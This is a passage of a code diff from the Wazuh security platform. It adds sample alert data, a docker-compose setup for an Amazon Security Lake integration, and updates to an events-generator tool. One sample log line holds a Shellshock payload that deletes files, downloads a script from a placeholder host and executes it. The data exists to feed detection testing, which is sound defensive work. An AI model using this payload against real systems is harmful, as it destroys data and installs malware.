+      ],
+      "tactic": [
+        "Privilege Escalation",
+        "Initial Access"
+      ]
+    },
+    "id": "31166",
+    "nist_800_53": [
+      "SI.4"
+    ],
+    "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
+    "gdpr": [
+      "IV_35.7.d"
+    ]
+  },
+  "location": "/var/log/nginx/access.log",
+  "decoder": {
+    "name": "web-accesslog"
+  },
+  "id": "1707402914.872885",
+  "GeoLocation": {
+    "city_name": "Amsterdam",
+    "country_name": "Netherlands",
+    "region_name": "North Holland",
+    "location": {
+      "lon": 4.9087,
+      "lat": 52.3534
+    }
+  },
+  "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
+  "timestamp": "2024-02-08T11:35:14.334-0300"
+}
\ No newline at end of file
diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml
new file mode 100644
index 0000000000000..65a8905bcd987
--- /dev/null
+++ b/integrations/docker/amazon-security-lake.yml
@@ -0,0 +1,115 @@
+version: "3.8"
+name: "amazon-security-lake"
+services:
+  events-generator:
+    image: wazuh/indexer-events-generator
+    build:
+      context: ../tools/events-generator
+    container_name: events-generator
+    depends_on:
+      wazuh.indexer:
+        condition: service_healthy
+    command: bash -c "python run.py -a wazuh.indexer"
+
+  wazuh.indexer:
+    image: opensearchproject/opensearch:2.11.1
+    container_name: wazuh.indexer
+    depends_on:
+      wazuh-certs-generator:
+        condition: service_completed_successfully
+    hostname: wazuh.indexer
+    ports:
+      - 9200:9200
+    environment:
+      # - cluster.name=opensearch-cluster
+      - node.name=wazuh.indexer
+      - discovery.type=single-node
+      # - cluster.initial_cluster_manager_nodes=opensearch-node
+      - bootstrap.memory_lock=true
+      - "DISABLE_INSTALL_DEMO_CONFIG=true"
+      - plugins.security.ssl.http.enabled=true
+      - plugins.security.allow_default_init_securityindex=true
+      - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem
+      - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem
+      - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem
+      - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem
+      - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US"
+      - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m"
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    healthcheck:
+      test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster
+      start_period: 10s
+      start_interval: 3s
+    volumes:
+      - data:/usr/share/opensearch/data
+      - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem
+      - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem
+
+  wazuh.dashboard:
+    image: opensearchproject/opensearch-dashboards:2.11.1
+    container_name: wazuh.dashboard
+    depends_on:
+      - wazuh.indexer
+    hostname: wazuh.dashboard
+    ports:
+      - 5601:5601 # Map host port 5601 to container port 5601
+    expose:
+      - "5601" # Expose port 5601 for web access to OpenSearch Dashboards
+    environment:
+      OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
+
+  wazuh.integration.security.lake:
+    image: wazuh/indexer-security-lake-integration
+    build:
+      context: ../amazon-security-lake
+    container_name: wazuh.integration.security.lake
+    depends_on:
+      - wazuh.indexer
+    hostname: wazuh.integration.security.lake
+    environment:
+      LOG_LEVEL: trace
+      LOGSTASH_KEYSTORE_PASS: "SecretPassword"
+      MONITORING_ENABLED: false
+      AWS_KEY: "AKIAIOSFODNN7EXAMPLE"
+      AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+    ports:
+      - "5000:5000/tcp"
+      - "5000:5000/udp"
+      - "5044:5044"
+      - "9600:9600"
+    volumes:
+      - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline
+      - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem
+    # command: tail -f /dev/null
+    command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic
+
+  s3.ninja:
+    image: scireum/s3-ninja:latest
+    container_name: s3.ninja
+    hostname: s3.ninja
+    ports:
+      - "9444:9000"
+    volumes:
+      - s3-data:/home/sirius/data
+
+  wazuh-certs-generator:
+    image: wazuh/wazuh-certs-generator:0.0.1
+    hostname: wazuh-certs-generator
+    container_name: wazuh-certs-generator
+    entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*"
+    volumes:
+      - ./certs/:/certificates/
+      - ./config/certs.yml:/config/certs.yml
+
+volumes:
+  data:
+  s3-data:
diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml
new file mode 100644
index 0000000000000..c3e017be10eea
--- /dev/null
+++ b/integrations/docker/config/certs.yml
@@ -0,0 +1,16 @@
+nodes:
+  # Wazuh indexer server nodes
+  indexer:
+    - name: wazuh.indexer
+      ip: wazuh.indexer
+
+  # Wazuh server nodes
+  # Use node_type only with more than one Wazuh manager
+  server:
+    - name: wazuh.manager
+      ip: wazuh.manager
+
+  # Wazuh dashboard node
+  dashboard:
+    - name: wazuh.dashboard
+      ip: wazuh.dashboard
diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore
new file mode 100644
index 0000000000000..0f028b576338e
--- /dev/null
+++ b/integrations/tools/events-generator/.dockerignore
@@ -0,0 +1,2 @@
+.venv
+Dockerfile
\ No newline at end of file
diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile
new file mode 100644
index 0000000000000..da32f8c042017
--- /dev/null
+++ b/integrations/tools/events-generator/Dockerfile
@@ -0,0 +1,4 @@
+FROM python:3.9
+COPY . /home/events-generator/
+WORKDIR /home/events-generator
+RUN pip install -r requirements.txt
\ No newline at end of file
diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md
index b11988192929e..ed8e53ea8acd9 100644
--- a/integrations/tools/events-generator/README.md
+++ b/integrations/tools/events-generator/README.md
@@ -41,3 +41,14 @@ INFO:event_generator:Event created
 INFO:event_generator:Event created
 {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1}
 ```
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-events-generator:latest .
+```
+
+Run with: 
+```console
+docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h
+```
\ No newline at end of file
diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py
index 3a6a4aeba9fc0..ec4ded0010c76 100644
--- a/integrations/tools/events-generator/run.py
+++ b/integrations/tools/events-generator/run.py
@@ -1,4 +1,4 @@
-#!/usr/bin/pyton
+#!/usr/bin/python3
 
 # Events generator tool for Wazuh's indices.
 # Chooses a random element from <index>/alerts.json to index
@@ -42,9 +42,11 @@ def __init__(self, path: str):
             self.size = len(self.elements)
 
     def get_random(self) -> str:
+        """
+        Returns the last element of the list
+        """
         random.shuffle(self.elements)
-        return self.elements.pop()
-        # return self.elements[random.randint(0, self.size)]
+        return self.elements[self.size-1]
 
 # ================================================== #
 
@@ -136,6 +138,11 @@ def parse_args():
     parser = argparse.ArgumentParser(
         description="Events generator tool for Wazuh's indices. Indexes a random element from <index>/alerts.json",
     )
+    parser.add_argument(
+        '-i', '--index',
+        default="wazuh-alerts-4.x-sample",
+        help="Destination index name or alias"
+    )
     parser.add_argument(
         '-o', '--output',
         choices=['indexer', 'filebeat'],
@@ -143,9 +150,9 @@ def parse_args():
         help="Destination of the events. Default: indexer."
     )
     parser.add_argument(
-        '-i', '--index',
+        '-m', '--module',
         default="wazuh-alerts",
-        help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)"
+        help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name."
     )
     # Infinite loop by default
     parser.add_argument(
@@ -189,7 +196,7 @@ def parse_args():
 
 
 def main(args: dict):
-    inventory = Inventory(f"{args['index']}/alerts.json")
+    inventory = Inventory(f"{args['module']}/alerts.json")
     logger.info("Inventory created")
     publisher = PublisherCreator.create(args["output"], args)
     logger.info("Publisher created")